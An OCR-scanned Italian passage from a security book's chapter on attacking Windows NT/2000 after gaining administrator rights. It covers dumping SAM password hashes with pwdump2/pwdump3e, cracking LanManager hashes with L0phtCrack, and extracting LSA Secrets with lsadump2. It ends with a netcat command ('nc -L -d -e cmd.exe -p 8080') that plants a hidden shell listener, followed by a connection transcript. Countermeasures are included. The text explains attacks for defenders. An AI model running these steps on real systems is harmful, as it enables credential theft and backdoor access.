stema in questa fase, In questo paragrafo descriveremo nel dettaglio alcuni stru- 
menti chiave e alcune tecniche che riescono a svolgere questi compiti. 


CD) Cattura degli hash delle password 


Diffusione: 8 
Semplicità: 10 
Impatto: 10 
Fattore di rischio: 9 


Con ogni probabilità gli aggressori, dopo aver acquisito privilegi equivalenti a quelli 
di un amministratore, procederanno spediti verso gli hash delle password del siste- 
ma. Essi sono memorizzati nel SAM (Security Accounts Manager) di NT in Windows 
NT4 e versioni precedenti, e nella Active Directory sui controllori di dominio (DC) 
di Windows 2000 e versioni successive. Il SAM è il contenitore dei nomi utenti e 
delle password, in formato cifrato, di tutti gli utenti del sistema locale, oppure del 
dominio se il computer in oggetto è un domain controller. 

Riuscire a ottenere questo file rappresenta il colpo di grazia dell'intrusione a un si- 
stema Windows NT, equivalente al possesso di file /etc/passwd nei sistemi UNIX. 
Anche se il SAM che l’hacker è in grado di ottenere è parte di un sistema NT standa- 
lone, esistono reali possibilità che il cracking di questo file possa rivelare anche le 
credenziali relative all'accesso a un controllore di dominio. Per questo motivo, un 
tool in grado di eseguire il cracking del SAM è anche uno di quelli più potenti per la 
scalata ai privilegi e lo sfruttamento delle relazioni di trust. 


Acquisizione degli hash 


Il primo passo in qualsiasi esercitazione di cracking delle password consiste nell’ac- 
quisire gli hash delle password. Tale obiettivo può essere raggiunto in diversi modi, 
che variano in base alla versione di Windows adottata. 

Windows NT 4 e le versioni precedenti memorizzano i dati degli utenti in un file chia- 
mato “SAM” all’interno della directory %systemroot%\system32\config. L'accesso a que- 
sta directory è bloccato finché il sistema operativo è in funzione. Il SAM è uno dei cin- 
que principali costituenti del Registro di sistema di Windows NT. Il file è la rappresenta- 
zione fisica dei dati disponibili nelle chiavi HKEY_LOCAL _MACHINE\SAM del Registro. 
Queste chiavi non possono essere consultate da un qualunque utente, nemmeno 
dall'utente Administrator (tuttavia ricorrendo a qualche trucco e al servizio Schedule di- 
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venta possibile accedervi). L'unica eccezione a questa regola riguarda i controllori di 
dominio di Windows 2000 e versioni successive; in questo caso gli hash delle password 
sono custoditi nella Active Directory (%windirX\NTDS\ntds.dit). Con la combinazione 
di default di oggetti installati, le dimensioni di questo file si avvicinano ai 10 MB ed esso 
è in forma criptata, per cui è improbabile che gli aggressori lo acquisiscano per analiz- 
zarlo in modalità offline. Se non si tratta di un controllore di dominio, il file SAM è tutto- 
ra memorizzato in modo molto simile a come avveniva in Windows NTA. 

Ora che sappiamo dove si trova il “tesoro”, come possiamo appropriarcene? Ci sono 
quattro metodi fondamentali per ottenere gli hash delle password sui sistemi della 
famiglia NT: 


e eseguire il boot sul sistema in oggetto, utilizzando un altro sistema operativo e 
copiando su un supporto rimuovibile il file contenente gli hash delle password; 


e creare una copia di backup del file SAM creato dalla procedura di Windows 
NT Repair Disk Utility; 


e utilizzare qualche strumento che resti in ascolto degli scambi di autenticazione; 


estrarre direttamente gli hash delle password dal file SAM o dall’Active 
Directory. 


Riavviare in modalità DOS e ottenere il SAM è possibile, anche malgrado l'NTFS, 
utilizzando la venerabile utility NTFSDOS di http://www.sysinternals.com/. 

Il file di backup di NT4 si trova in \%systemroot%\repair\SAM._; questo file contie- 
ne tutti gli hash degli utenti aggiornati al momento dell’ultimo utilizzo dell’utility Re- 
pair Disk (rdisk). In Windows 2000 e versioni superiori, l'applicazione di backup 
di Microsoft (ntbackup.exe) prevale sulla funzione Create Emergency Repair Disk 
e viene effettuata una copia di backup degli hash delle password, salvata nella car- 
tella %windir%\repair\RegBack. Gli attacchi contro questa versione di backup del 
SAM sono infruttuosi, poiché questo file è elaborato con SYSKEY e i meccanismi 
per decriptare un file di questo tipo (a differenza di quanto avviene quando si cripta 
con pwdump2 un SAM attivo) non sono stati resi pubblici. 

Abbiamo parlato dell’intercettazione del traffico di autenticazione nella famiglia NT 
in “Intercettazione del traffico di scambio delle password sulla rete” nella prima par- 
te di questo capitolo; pertanto rimane solo da parlare dell’“Estrazione degli hash 
delle password effettuata direttamente dal SAM o dalla Active Directory”. Questo 
sarà l'argomento successivo. 


Estrazione degli hash con pwdumpX 


Con i privilegi dell'utente Administrator, gli hash delle password possono essere tra- 
sferiti direttamente dal Registro di sistema in un file simile a /eto/passwd dei sistemi 
UNIX. Il programma in grado di effettuare questa operazione è chiamato pwdump ed è 
stato scritto da Jeremy Allison. Il codice sorgente è disponibile su diversi siti Internet, 
così come i file binari eseguibili per Windows, Le versioni recenti di LOphtCrack di- 
spongono di una funzionalità interna che è in grado di effettuare le stesse operazioni 
di pwdump. Tuttavia il Service Pack 2 di Windows NT ha migliorato le funzioni di cifra- 
tura SYSKEY del file SAM, per cui né l’utility pwdump, né LOphtCrack sono in grado di 
aggirare questa nuova protezione (si veda il paragrafo di questo capitolo dedicato alle 
contromisure per il cracking delle password). SYSKEY è attualmente parte della con- 
figurazione di default per Windows 2000 (per ulteriori informazioni su SYSKEY, con- 
sultate l'articolo del Knowledge Base Q143475). Pertanto, il tool pwdump non è in gra- 
do di estrarre correttamente gli hash delle password dal Registro sui server Windows 
2000 nella loro configurazione di default. Per effettuare questa operazione occorre un 
tool più potente. 
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Esiste anche una versione più avanzata di pwdump, scritta da Todd Sabin e chiamata 
pwdump2, in grado di aggirare SYSKEY. L’utility pwdump2 è disponibile all'indirizzo 
http://razio.bindview.com. In pratica questa utility si serve della tecnica dell’inie- 
zione di codice nella libreria DLL (a cui abbiamo già accennato nella descrizione del 
programma getadmin), per caricare il proprio codice eseguibile nello spazio di me- 
moria di un altro processo, che dispone di privilegi di accesso al sistema maggiori. 
Una volta trasferite in un processo a cui sono assegnate maggiori autorizzazioni, il 
codice dannoso può effettuare liberamente una chiamata API interna che accede alle 
password criptate con SYSKEY, senza che sia necessario decriptarle. 

Al contrario di pwdump, pwdump2 deve essere avviato in modo interattivo. Inoltre è 
sempre necessario disporre dei privilegi di accesso dell'utente Administrator e la li- 
breria samdump.dll fornita con pwdump2 deve essere disponibile. 

Il processo di sistema che viene attaccato e invaso da pwdump2 è lsass.exe (Local 
Security Authority Subsystem). Il programma inserisce il proprio codice nello spazio 
di indirizzamento di lsass e nel contesto dell’utente. Un pwdump2 aggiornato effet- 
tua automaticamente l’enumerazione del LSASS PID, per cui l’enumerazione ma- 
nuale dell’ID di processo (PID) LSASS non è necessaria (se la vostra versione di 
pwdump vi chiede di effettuarla, significa che avete una versione obsoleta). Inoltre, 
occorre la versione aggiornata di pwdump2 per scaricare gli hash a livello locale dai 
controllori di dominio, poiché essi si appoggiano ad Active Directory anziché al tra- 
dizionale SAM per la memorizzazione degli hash delle password. 

Ebusiness technology, inc. ha rilasciato una versione modificata del tool originale 
pwdump2 di Todd Sabin, chiamata pwdump3e (http://ww.ebiz-tech.com/html 
/pwdump.html). pwdump3e installa la DLL samdump come servizio al fine di estrarre 
gli hash in modalità remota tramite SMB (TCP 139 or 445), pwdump3e non è in grado 
di funzionare nei confronti del sistema locale. 


N La versione 4 di LOpbiCrack è ora in grado di estrarre bash dal SAM e dalla 
Ig Active Directory criptati con SYSKEY, ma funziona unicamente in modali- 
tà remota su sistemi non criptati con SYSKEY. 


© Contromisure all’utilizzo di pwdumpX 


A patto che l'iniezione di codice nelle librerie DLL funzioni ancora in Windows, non 
ci sono difese contro pwdump2 o pwdump3; consolatevi pensando che pwdumpX necessi- 
ta di privilegi di Administrator per essere eseguito. Se gli hacker hanno già conquista- 
to questo vantaggio, è probabile che sul sistema locale ci siano poche altre operazioni 
che non hanno ancora realizzato (l'utilizzo degli hash delle password catturati per at- 
taccare sistemi di fiducia è comunque differente, come vedrete tra breve). 


® Cracking delle password 


Diffusione: 8 
Semplicità: 10 
Impatto: 10 
Fattore di rischio: 9 


Il nostro intrepido intruso ha dunque messo le mani sugli hash delle password. Un 
momento, però: non si dice in tutti i libri sulla crittografia che abbiamo letto che 
l'hashing è un processo di cifratura a senso unico? Se questi hash delle password 
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sono stati creati con un algoritmo dignitoso, dovrebbe essere impossibile derivare 
da essi le password in chiaro. 

Purtroppo, grazie alla scelta di Microsoft di mantenere la compatibilità con il passa- 
to, la sicurezza dei file contenuti nel SAM è stata largamente compromessa utilizzan- 
do un algoritmo di hash che risale ai tempi di IBM LAN Manager di NT. 

Nonostante da anni sia disponibile l'algoritmo NTLM, più sicuro e recente, proprie- 
tario di Windows NT, il sistema deve memorizzare l'hash LanManager per essere in 
grado di eseguire l'autenticazione di client Windows 9x e Windows per Workgroup. 
L'hash LM è tuttora memorizzato di default su Windows 2000 e versioni successive, 
allo scopo di assicurare la compatibilità con versioni precedenti di client non appar- 
tenenti alla famiglia NT. Il più debole algoritmo di hash LanManager è stato decifra- 
to, per cui gli hash LanManager memorizzati nel SAM funzionano da tallone d’'Achil- 
le che permette, nella maggior parte dei casi, di decifrare le password in modo ab- 
bastanza semplice, in base alla loro composizione. Il processo di derivazione delle 
password in chiaro a partire dagli hash è chiamato cracking delle password o, spes- 
so, semplicemente cracking. 

Il cracking delle password può sembrare una specie di operazione magica, ma in 
realtà è poco più di una identificazione delle password rapida e complessa. Una 
volta ottenuto l'algoritmo di hash lo si può utilizzare per calcolare l’hash da una lista 
di possibili valori di password (per esempio, tutte le parole di un dizionario) e con- 
frontare il risultato ottenuto con l’hash conosciuto della password reale, estratto uti- 
lizzando pwdumpX. Se i due hash coincidono, allora la password è stata correttamen- 
te indovinata. Questa procedura viene generalmente eseguita in modalità non in li- 
nea, elaborando il file delle password che è stato ottenuto in precedenza; in questo 
modo il blocco dell'utente per eccesso di tentativi non è un problema e il program- 
ma di decifratura può continuare l'elaborazione per un tempo indefinito. Queste 
procedure di elaborazione e di confronto degli hash sono comunque costituite da 
algoritmi molto onerosi per le CPU ma, come abbiamo spiegato, le debolezze cono- 
sciute negli algoritmi di hash (come la relativa facilità di computazione dell’algorit- 
mo LanManager) vengono sfruttate per velocizzare in modo significativo i tempi di 
elaborazione delle password. La ricerca della password risulta quindi essere un pro- 
blema di tempo di elaborazione della CPU e di dimensione del dizionario delle pa- 
role di partenza. 

In effetti, vi abbiamo già parlato in questo capitolo di LOphtCrack, uno dei più diffusi 
tool per il cracking dei file SAM eseguito allo scopo di rivelare le password. A quanto 
si dice, qualcuno è riuscito in sole 48 ore, con un Pentium II/300, a eseguire il crack 
del 90% delle password di una società di tecnologie di grandi dimensioni dotata di una 
solida politica di gestione delle password. La versione grafica di LOphtCrack è distribu- 
ita da @Stake, all'indirizzo http://ww.atstake.com/research/lc/index.html. È 
disponibile gratuitamente una versione per la riga di comando. La versione più recente 
di questo strumento di cracking delle password è la 4, ed è quella illustrata in questo 
paragrafo. 

Come abbiamo già visto, LOphtCrack può importare i dati contenuti nel SAM da di- 
verse fonti: da un registro remoto, da file SAM grezzi, da file di NT4 SAM._ e da file 
di backup, restando in ascolto sul segmento di rete in attesa del transito di hash del- 
le password; infine può importare dati, da file LophtCrack (lc e .lcs), e da file di out- 
put di pwdumpX. 
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Una volta che avete importato gli hash, dovete selezionare le opzioni di sessione 
nel menu Session/Session Options File. Qui potete scegliere se effettuare un attacco 
di tipo dizionario, a forza bruta, o ibrido, come mostrato nella Figura 5.7. 


Auditing Options For This Session 


Dictionary Ciak * 
f Enabled Dictionary List 


The Dictionary Crack tests for passwords that are the same as the words listed in the 
word file. This test is very fast and finds the weakest passwords. 

Dictionary/Brute Hybrid Crack - 3 

W Epabled fo “] Characters to prepend 


fe “] Characters to append 


TT Common letter substitutions (much slower) 


The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in 
the word file. It finds passwords such as "Dana99" or “monkeys!". This test is fast and 
finds weak passwords. 


[A-Z and0-3 “] 


CharscterSat [listeach character) 


| The Brute Force Crack tests for passwords that are made up of the characters specified 
in the Character Set. It finds passwords such as 'iWeR3plt6s" or "vC5X69+12b". This 
test is slow and finds medium to strong passwords. Specily a character set with more 
characters to crack stronger passwords. 


Figura 5.7 
Finestre di selezione delle opzioni di sessione di LOphtCrack 4. 


Il crack con un dizionario è il più semplice di questi approcci. Esso legge una lista 
di termini e ne genera gli hash uno per volta, confrontandoli via via con la lista di 
hash. Sebbene questo confronto avvenga molto velocemente, possono essere indi- 
viduate unicamente le password contenute nel dizionario fornito dall’aggressore. 


PR NOn utilizzate il dizionario di parole inglesi fornito assieme a LC4: ab- 
Rg biamo infatti notato che diverse parole sono assenti. All'indirizzo http: 
//coast.cs.purdue.edu/pub/dict/ troverete esempi di dizionari e liste 

di parole per eseguire il crack. 


L’abilitazione dell'opzione Brute Force Crack (crack di tipo forza bruta) consente di 
tentare l’attacco utilizzando stringhe casuali, generate in base al set di caratteri sele- 
zionato, ma appesantisce notevolmente lo sforzo di elaborazione. LOphtCrack tenta 
innanzitutto di utilizzare il dizionario di parole specificato, ma questo ha poca im- 
portanza perché l'elaborazione può essere interrotta e ripresa successivamente dal 
punto in cui era stata bloccata. Esiste una pratica che è una via di mezzo tra l’attacco 
basato sul dizionario di parole e il Brute Force Crack: la funzione Hybrid. Questo 
tipo di attacco, detto “ibrido”, consente di utilizzare il dizionario di parole al quale 
viene però accodato uno o più caratteri casuali in successione. Questa è una tecnica 
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comune tra gli utenti pigri che scelgono password come “prova123”, in mancanza 
di combinazioni più originali. 

Infine, in questa finestra potete scegliere di effettuare un crack distribuito, che sem- 
brerebbe essere qualcosa di molto stravagante ma che in realtà prevede solo che 
LC4 suddivida gli hash delle password in diversi file (il numero lo specificherete voi 
stessi nelle finestre Part X of X situata nella parte inferiore della Figura 5.7). Potete 
anche scegliere di distribuire questi file su diverse macchine, eseguendo il crack in 
modo indipendente. 

Inoltre, nel menu Session, potete decidere se desiderate tentare di effettuare il crack 
dell’hash LM o dell’hash NTLM. Poiché l'esecuzione del crack dell’hash LM è molto 
più veloce, provate prima a effettuare questa operazione. 

Dopo aver selezionato le opzioni desiderate, è sufficiente scegliere Session/Begin Au- 
dit e il programma LOphtCrack inizierà a lavorare. Con la maggior parte degli hash 
che abbiamo ottenuto da aziende di grandi dimensioni nel corso delle nostre missioni 
di consulenza, le password nulle e le parole dei dizionari vengono rivelate istantane- 
amente, come si vede nella colonna £M Password della Figura 5.8. Questa figura met- 
te anche in evidenza quanto sia semplice decifrare gli algoritmi LanManager. Questi 
sono infatti i primi a cadere rendendo praticamente inefficace la disponibilità del più 
forte algoritmo di hash di NT. Anche per le password che non vengono individuate 
immediatamente, come nel caso degli utenti “einhorn” e “finkle"”, la vulnerabilità 
dell’hash LanManager consente di individuare con facilità l'ottavo e i primi sette carat- 
teri delle password, rispettivamente. Le password di einhorn e finkle cadranno proba- 
bilmente solo se sottoposte a un cracking di maggiore intensità (a questo punto ab- 
biamo eseguito solo un cracking di tipo dizionario mostrato nella Figura 5.8). 


WE! stake LCA - [Untitled4] 


Administrator 

clueless password Od Oh Om is Dictionary 
einhorn 

finkle 1234567????7?? 

Guest * missing * * missing * 

IUSR_MIRAGE 

IWAM_MIRAGE 

SUPPORT_388945a0 —* missing * 


FS 


Figura 5.8 


LOphtCrack in azione mentre effettua il cracking delle password. Le password deboli 
di LanMan sono più facili da indovinare, il che elimina la necessità di indovinare 
le password NTLM, definite in modo più criptico. 


Poiché le informazioni risultanti dal crack delle password sono periodicamente sal- 
vate in file che hanno estensione .lc, il programma LOphtCrack può essere interrotto 
e riavviato successivamente, partendo dal punto in cui si è precedentemente ferma- 
to nell’elaborazione: è sufficiente utilizzare l'opzione Open Session del menu File, 

Il programma grafico LOphtCrack è il miglior programma di crack delle password 
per Windows NT disponibile sul mercato, sia in termini di pura potenza, sia in ter- 


182 Capitolo 5 


mini di facilità di utilizzo. L'interfaccia grafica di LOphtCrack presenta però uno 
svantaggio: non è possibile creare script per il controllo automatico delle operazioni 
dell’applicazione. Esiste una vecchia versione 1.5 di LOphtCrack che funziona dalla 
riga di comando, disponibile insieme al suo codice sorgente sul sito di LOpht (chia- 
mata le_cli.,exe), ma sono disponibili altri potenti strumenti di cracking a riga di 
comando. Il nostro programma preferito è John the Ripper, un programma di 
cracking delle password orientato essenzialmente all’utilizzo di un dizionario, scrit- 
to da Solar Designer e disponibile al sito http: //ww.openwall.com/john. Questo 
programma è uno strumento a riga di comando concepito in primo luogo per deci- 
frare i file di password UNIX e degli hash LanManager di Windows NT. Oltre a esse- 
re uno strumento multipiattaforma, compatibile con diversi algoritmi di hash, John 
presenta il vantaggio di essere anche estremamente rapido e soprattutto gratuito. La 
grande quantità di opzioni che è in grado di gestire rende, però, questo strumento 
molto più difficile da apprendere rispetto a LOphtCrack; inoltre, poiché John è in 
grado di decifrare unicamente gli hash LanManager, le password che risultano dalla 
sua elaborazione non distinguono tra maiuscole e minuscole e possono non rispec- 
chiare la reale combinazione di caratteri delle password da individuare. 


Contromisure al cracking delle password 


La migliore difesa contro gli attacchi di decodifica delle password stranamente non 
è di carattere tecnico, ma è comunque la strategia più difficile da adottare: utilizzare 
sempre buone password. La scelta di parole comuni, così come lo scrivere la pro- 
pria password sul block notes della scrivania (0 su un post-it), dovrebbe essere una 
delle pratiche bandite dagli amministratori di sistema. Riteniamo che la spiegazione 
di alcune delle debolezze proprie degli algoritmi di hash delle password della fami- 
glia Windows NT allarmerà non poco la vostra comunità di utenti. 

Abbiamo parlato in precedenza della necessità, da parte di Windows NT, di utilizzare 
due diversi tipi di cifratura delle password: l'algoritmo di hash di LanManager e l’algo- 
ritmo di hash di Windows NT. Entrambi questi hash sono memorizzati all’interno del 
SAM. Come spiegheremo brevemente, l'hash LanManager viene creato con una tecni- 
ca che è intrinsecamente più debole (questa debolezza non è da imputare a Micro- 
soft, poiché l'algoritmo LanManager è stato inizialmente sviluppato da IBM). 

La debolezza più critica dell’hash LanManager risiede nella suddivisione della password 
in due metà composte ciascuna di sette caratteri. Per questo motivo una password di 
otto caratteri viene elaborata come due mezze password: la prima composta di sette ca- 
ratteri e la seconda da uno solo. Strumenti come LOphtCrack, ovviamente, approfittano 
di questa debolezza per cercare di decifrare indipendentemente le due metà come se 
fossero due password separate. Scegliamo, per esempio, una password di dodici carat- 
teri compatibili con i criteri di sicurezza imposti da Passfilt: “1234560werty”. Quando 
questa password viene elaborata utilizzando l'algoritmo LanManager, per prima cosa è 
convertita in caratteri maiuscoli: “123456QWERTY”, Se la password ha una lunghezza 
inferiore a quattordici caratteri, vengono aggiunti caratteri nulli al termine della stringa 
per raggiungere la lunghezza di quattordici: “123456QWERTY__”. Prima di iniziare la ci- 
fratura della password, questa viene divisa in due stringhe di sette caratteri ciascuna: 
“1234560” e “WERTY__”. Viene calcolato l'hash di ciascuna di queste due metà e i risul- 
tati ottenuti sono concatenati: l’hash di “1234560” è il seguente: 6BF11E04AFAB197F; 
quello di “WERTY__” è: 1E9FFDCC75575B15. L'hash LanManager risultante è, infatti, 
6BF11E04AFAB197F1F9FFDCC75575B15. 

La prima metà di questa password contiene una serie mista di caratteri alfanu- 
merici: un attacco di tipo forza bruta (utilizzando l'opzione Brute Force Attack di 
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LOphtCrack) potrebbe richiedere al massimo ventiquattr'ore per decifrare la stringa 
corrispondente, in base alla potenza del computer a disposizione per effettuare 
l'elaborazione. La seconda metà dell’hash contiene solamente cinque caratteri alfa- 
numerici e può essere decifrata in meno di sessanta secondi se l'elaborazione vie- 
ne realizzata con un computer di classe Pentium. 

Dopo aver individuato la mezza password corrispondente all’hash disponibile, 
quest'ultima viene visualizzata da LOphtCrack. A questo punto è possibile effettuare 
qualche tentativo mirato per indovinare con maggiore facilità la prima parte della 
password. La serie di caratteri “WERTY” suggerisce che la password è stata scelta 
utilizzando una serie di caratteri consecutivi sulla tastiera. Questo indizio ci ha in- 
dotto a prendere in considerazione altre possibili combinazioni di password: 
“QWERTYOWERTY”, “POIUYQWERTY”, “ASDFGHOWERTY”, “YTREWQQWER- 
TY” e, ovviamente, anche “123456Q0WERTY”. Tutte queste parole possono essere 
registrate in un dizionario personalizzato, per poter essere utilizzate rapidamente 
con LOphtCrack. È possibile avviare una successiva sessione, che inizialmente pren- 
de in considerazione le password aggiunte al nostro dizionario. 

Questo esempio mostra come sia relativamente facile riuscire a indovinare alcune 
password che all'apparenza sembrano veramente difficili da elaborare, utilizzando 
gli indizi disponibili dopo aver eseguito il cracking della seconda parte dell’hash 
LanManager. In questo caso possiamo affermare che password lunghe dodici o tre- 
dici caratteri sono addirittura meno sicure di una password lunga soli sette caratteri, 
sempre che la seconda parte della password contenga indizi sufficienti per cercare 
di indovinare la prima parte. Una password lunga otto caratteri generalmente non 
fornisce molte informazioni, ma in ogni caso è sempre meno sicura di una pass- 
word lunga sette caratteri. 

Per accertarvi che le password da voi scelte non vengano tradite immediatamente 
da questo tipo di attacchi, vi consigliamo di utilizzare password lunghe esattamente 
7 o 14 caratteri: considerando che l’utente medio sarà tentato di scriversi da qualche 
parte una password lunga 14 caratteri, consigliamo di adottare in ogni caso una lun- 
ghezza di 7 caratteri. 

Per rendere la vita veramente difficile ai pirati che utilizzano LOphtCrack, consiglia- 
mo di inserire a metà delle password almeno un carattere ASCII non stampabile, 
come per esempio Alt+255(tn) oppure Alt+12%tn). Anche se la password viene cor- 
rettamente interpretata da LOphtCrack, questi caratteri non potranno essere visualiz- 
zati dalla sua interfaccia grafica. Dobbiamo riconoscere che l’utilizzo quotidiano di 
password di questo tipo potrebbe risultare piuttosto fastidioso, per la maggiore 
quantità di tempo e attenzione necessari per digitarla. Probabilmente non vale la 
pena utilizzare espedienti di questo tipo per proteggere utenti che non abbiano re- 
almente accessi privilegiati al sistema. Per gli utenti che fanno parte dei gruppi di 
amministrazione e di servizio dovrebbe valere, invece, la considerazione opposta: 
l'utilizzo di caratteri ASCII non stampabili all’interno della password dovrebbe di- 
ventare uno standard. 

Non dimenticate comunque di utilizzare Passfilt per potenziare i requisiti minimi di 
complessità della scelta delle password, come abbiamo già detto nel paragrafo “At- 
tacchi SMB (Server Message Block)” nella prima parte di questo capitolo. 


In Windows XP e .NET Server 2003, è possibile disattivare la memorizzazio- 
ne dell’hash LM utilizzando l'impostazione della Security Policy “Network 
Security: Do Not Store LAN Manager Hash Value On Next Password Chan- 


» ge”. Sebbene questa operazione possa provocare problemi di compatibilità 
IL con le versioni precedenti in ambienti eterogenei con vari sistemi Windows, 
v consigliamo caldamente di effettuarla. 
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® LSADump 


Diffusione: 8 
Semplicità: 10 
Impatto: 10 
Fattore di rischio: 9 


La vulnerabilità relativa a LSA Secret è uno degli esempi più insidiosi dei pericoli 
che si possono correre quando le credenziali di accesso ai sistemi esterni non ven- 
gono cifrate, I sistemi della famiglia N'T conservano queste credenziali insieme ad 
altre informazioni interessanti. Una tale miniera di informazioni delicate è chiamata 
LSA (Local Security Authority) Secrets; è memorizzata nel Registro di sistema ed è 
raggiungibile selezionando il percorso HKEY_LOCAL_MACHINE\SECURITY\Poli- 
cy\Secrets. LSA Secrets comprende gli elementi elencati di seguito, 


e Password di servizio memorizzate in chiaro. Gli account di servizio sono ri- 
chiesti dai programmi che devono eseguire la connessione nel contesto di 
un utente locale per eseguire alcune attività, come per esempio il backup. 
In genere si tratta di account definiti in domini esterni che, quando vengo- 
no scoperti da un sistema manomesso, forniscono al pirata un metodo per 
connettersi direttamente al dominio esterno. 


e Gli hash delle password utilizzate dagli ultimi dieci utenti per connettersi 
alla macchina. 

e Le password in chiaro di accesso ai siti FTP e Web. 

e Nomiutente e password di account remoti RAS (Remote Access Services). 

e Le password delle stazioni di lavoro per l’accesso al dominio. 


Ovviamente la disponibilità delle password di servizio, degli ultimi nomi utente uti- 
lizzati, delle password di accesso al dominio ecc. può compromettere seriamente la 
sicurezza dell'intera struttura del dominio. 

Immaginate per esempio un server standalone in cui sono installati servizi di SQL 
Server e Microsoft SMS eseguiti nel contesto dell’utente di un dominio. Se la pass- 
word dell'utente locale Administrator è vuota, le informazioni contenute nelle chia- 
vi di registro LSA Secrets possono funzionare da trampolino di lancio per ottenere le 
credenziali di accesso al dominio. Se in un server dei domini delle risorse viene ese- 
guito un servizio nel contesto di un account utente dal dominio principale, una 
compromissione del server nel dominio delle risorse potrebbe consentire a un in- 
truso malintenzionato di ottenere le credenziali nel suddetto dominio principale. 
Possiamo immaginare una situazione ancora più preoccupante: considerate la “flot- 
ta” di PC portatili della vostra azienda. Le alte sfere dell'azienda portano a casa il PC 
portatile in cui è installato NT e utilizzano (giustamente) le funzionalità RAS (Acces- 
so Remoto) della postazione, per collegarsi alla rete aziendale e a Internet tramite il 
provider personale. Supponiamo che chi utilizza il portatile sia stato correttamente 
istruito sui problemi di sicurezza e non selezioni la casella di controllo Save Pass- 
word, per evitare la memorizzazione della password di collegamento durante le ses- 
sioni di connessione. Per nostra sfortuna i dati relativi alla password, al numero di 
telefono e al nome utente vengono comunque salvati nelle chiavi LSA del Registro 
di sistema. 

Dal 1997 è disponibile sulla mailing list NTBugtraq (disponibile al sito http:// 
ww.ntbugtraq.com) un esempio di codice sorgente scritto da Paul Ashton, in grado 
di visualizzare il contenuto delle informazioni localizzate nella LSA (Local Security Au- 
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thority) agli amministratori connessi in locale. I file eseguibili del codice sorgente non 
sono stati diffusi su vasta scala. Una versione aggiornata di questo codice chiamata 
lsadump2 è disponibile all’indirizzo http://razor.bindview.com/tools/. 

lsadump2 si serve della stessa tecnica di pwdump2 (iniezione di codice nella libreria 
DLL) per neutralizzare le contromisure di sicurezza del sistema operativo. 1sadump2 
trova automaticamente il PID di LSASS, inserisce il proprio codice e sottrae LSA Se- 
crets, come viene mostrato di seguito (per motivi di spazio l'output è lievemente 
modificato): 


C:\>lsadump2 

$MACHINE . ACC 

6E 00 76 00 76 00 68 00 68 00 SA 00 30 00 41 00 n.v.v.h.h.Z.0.A. 
66 00 68 00 50 00 6C 00 41 00 73 00 f.h.P.1.A.8, 
_SC_MSSQLServer 

32 00 6D 00 71 00 30 00 71 00 71 00 31 00 61 00 .p.a.s.s.w.0.r.d. 
_SC_SQLServerAgent 

32 00 6D 00 71 00 30 00 71 00 71 00 31 00 61 00 p.a.s.s.w.0.r.d. 


Tra gli LSA Secrets di questo sistema possiamo notare la password della macchina e 
due password relative al servizio SQL. Non si vuole molta immaginazione per capi- 
re che le reti della famiglia NT di grandi dimensioni possono essere messe rapida- 
mente fuori uso tramite questo tipo di enumerazione delle password. 


Contromisure all’intercettazione di LSA Secrets 


Sfortunatamente, Microsoft non considera critica la divulgazione di questi dati in 
quanto, come affermato nell’articolo Q184017 di Knowledge Base che descrive la di- 
sponibilità dell'aggiornamento originale di LSA, l’accesso a queste informazioni come 
utente Administrator è reso possibile dal codice, La soluzione fornita da Microsoft è in 
grado di cifrare con maggior sicurezza le password di servizio, le credenziali di acces- 
so ai domini presenti in cache e le password delle postazioni di lavoro, utilizzando un 
metodo di cifratura del tipo SYSKEY. Ovviamente, 1sadump2 neutralizza la protezione 
utilizzando la tecnica dell'iniezione di codice nella libreria DLL. 

Pertanto, la migliore difesa contro 1sadump2 consiste innanzitutto nell'impedire l’ac- 
cesso come amministratore. È inoltre opportuno essere molto cauti riguardo all’uti- 
lizzo di account di servizio e di trust di dominio. Evitate a ogni costo di utilizzare ac- 
count di domini con privilegi elevati per avviare servizi su macchine locali! 

Esiste un aggiornamento diverso (SP6a), che è in grado di risolvere il problema della 
protezione dell’accesso alle credenziali di accesso remoto (origininariamente si trovava 
in un aggiornamento successivo alla pubblicazione del Service Pack 5 di Microsoft, di- 
sponibile all'indirizzo Web ftp://ftp.microsoft.com/bussys/winnt/winnt-public 
|fixes/usa/nt40/Hotfixes-PostSP5/RASPassword-fix/). Troverete ulteriori infor- 
mazioni consultando l'articolo Q230681 di Microsoft Knowledge Base. 


Controllo remoto e backdoor 


Abbiamo già accennato alla mancanza, in Windows NT, della possibilità di eseguire 
comandi da una postazione remota. In realtà non abbiamo ancora spiegato come 
Stanno esattamente le cose, Una volta che l'utente si è qualificato come Administra- 
tor, ha a disposizione una gamma infinita di possibilità. 
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C) Tool di controllo remoto a riga di comando 


Diffusione: 9 
Semplicità: 8 
Impatto: 9 
Fattore di rischio: 9 


Una delle backdoor più facili da installare usufruisce di quella sorta di “coltellino sviz- 
zero di TCP/IP” che è il programma netcat (disponibile all'indirizzo http:// 
ww.atstake.com/research/tools/index.html). netcat è in grado di rimanere in 
ascolto su una certa porta e di avviare un programma quando un sistema remoto vi si 
connette. Se configuriamo netcat in modo che sia avviata una sessione di comando 
di NT, questa sessione può essere rilanciata al sistema remoto chiamante. Di seguito 
potete osservare la sintassi da utilizzare per avviare netcat, in modo che rimanga na- 
scosto in attesa delle connessioni su una certa porta. Il parametro -L consente di man- 
tenere netcat attivo in ascolto anche dopo che la comunicazione si è interrotta; -d 
avvia netcat in modalità nascosta (senza console applicativa); -e specifica quale pro- 
gramma deve essere eseguito (nel nostro caso cmd.exe, l'interprete di comandi di 
Windows NT). Il parametro -p indica a netcat la porta presso cui rimanere in ascolto: 


C:\>nc -L -d -e cmd.exe -p 8080 


Grazie a questo comando, chiunque si possa connettere alla porta 8080 del server, 
riceverà il prompt dei comandi come risposta. Nell'esempio seguente utilizzeremo 
netcat per connetterci alla porta remota del server visto in precedenza (indirizzo IP 
192.168.202.44) e ricevere il prompt dei comandi remoti. Anche questa volta, per 
non creare confusione, il prompt locale è indicato con D: \>, mentre quello del ser- 
ver remoto è C: \TEMP\NC11NT>. 


C:\> nc 192.168.202.44 8080 
Microsoft(R) Windows NT(TM) 
(C) Copyright 1985-1996 Microsoft Corp. 
C:\TEMP\NC11NT> 
C:\TEMP\NC11NT>ipconfig 
ipconfig 
Windows NT IP Configuration 
Ethernet adapter FEMS5561: 

IP Address. 

1 192,168.202.44 
Subnet Mask . . ...... 1! 255,255.255.0 
Default Gateway . $ 


C:\TEMP\NC11NT>exit 


Come potete vedere, l'utente remoto ha la possibilità di eseguire comandi e file a 
piacere: l’unico limite a questo punto è imposto dalla propria fantasia alle prese con 
la console di Windows NT. 
